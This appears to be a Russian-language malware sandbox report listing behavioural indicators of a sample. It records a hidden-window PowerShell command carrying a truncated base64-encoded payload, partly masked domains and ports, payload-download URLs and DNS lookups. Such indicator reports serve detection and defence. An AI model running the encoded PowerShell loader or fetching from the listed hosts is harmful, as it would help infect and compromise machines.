Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABSAGYASABSAHoAUAAxAGYAPQAnAFgANQBYAFoARwA4ACcAOwAkAGEAaQBCAGIAUQBtAEMAZgAgAD0AIAAnADQAOQA2ACcAOwAkAE4ASQAxAFYAdwBUADkAYgA9ACcAVQA3AEEAegBYAGMAegBLACcAOwAkAE0AYwBDAHcARABUAD0AJABlAG4Ad...
- 'pr###kthd.com':80
- 'pr#####omascaras.com':443
- 'ps###ection.com':80
- 'ps###ection.com':443
- 'ro###ebyrd.com':80
- 'ro###esta.com':443
- http://pr###kthd.com/pub/EyRNTFJzOr/
- http://ps###ection.com/84kmcpyjk_rstllbc0q-80240/
- http://ro###ebyrd.com/fonts/dkra921_6lqtntd23r-9620475/
- 'pr#####omascaras.com':443
- 'ps###ection.com':443
- 'ro###esta.com':443
- DNS ASK pr###kthd.com
- DNS ASK pr#####omascaras.com
- DNS ASK ps###ection.com
- DNS ASK ro###ebyrd.com
- DNS ASK ro###esta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABSAGYASABSAHoAUAAxAGYAPQAnAFgANQBYAFoARwA4ACcAOwAkAGEAaQBCAGIAUQBtAEMAZgAgAD0AIAAnADQAOQA2ACcAOwAkAE4ASQAxAFYAdwBUADkAYgA9ACcAVQA3AEEAegBYAGMAegBLACcAOwAkAE0AYwBDAHcARABUAD0AJABlAG4Ad...' (со скрытым окном)